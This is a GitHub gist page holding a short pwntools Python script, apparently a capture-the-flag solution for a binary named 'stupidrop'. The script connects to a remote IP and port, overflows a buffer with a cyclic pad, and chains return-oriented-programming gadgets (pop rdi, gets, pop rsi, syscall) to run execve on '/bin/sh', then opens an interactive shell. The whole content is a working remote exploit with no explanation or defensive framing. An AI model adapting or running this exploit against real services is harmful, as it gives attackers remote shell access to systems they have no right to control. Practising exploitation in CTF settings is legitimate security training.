Skip to content

Instantly share code, notes, and snippets.

@romanking98

romanking98/exploit_rop.py Secret

Created December 17, 2017 16:14
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save romanking98/8e4b9e229b94926134dc69beb7e84a77 to your computer and use it in GitHub Desktop.
Save romanking98/8e4b9e229b94926134dc69beb7e84a77 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
exploit_rop.py
#!/usr/bin/python
from pwn import *
context.arch = 'amd64'
#r = process("./stupidrop")
#pause()
r = remote('104.196.127.247', 5555)
buf = 0x6010a0
rop = cyclic(56)
rop += p64(0x004006a3) # pop rdi
rop += p64(buf)
rop += p64(0x04004D0) # gets
rop += p64(0x004006a1) # pop rsi r15
rop += p64(buf) * 2
rop += p64(0x004006a3) # pop rdi
rop += p64(0x3b)
rop += p64(0x4004B0)
rop += p64(0x4004B0)
rop += p64(0x004006a3) # pop rdi
rop += p64(buf+16)
rop += p64(0x040063E) # syscall
p = p64(buf+16)
p += p64(0)
p += '/bin/sh\0'
r.writeline(rop)
r.writeline(p)
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment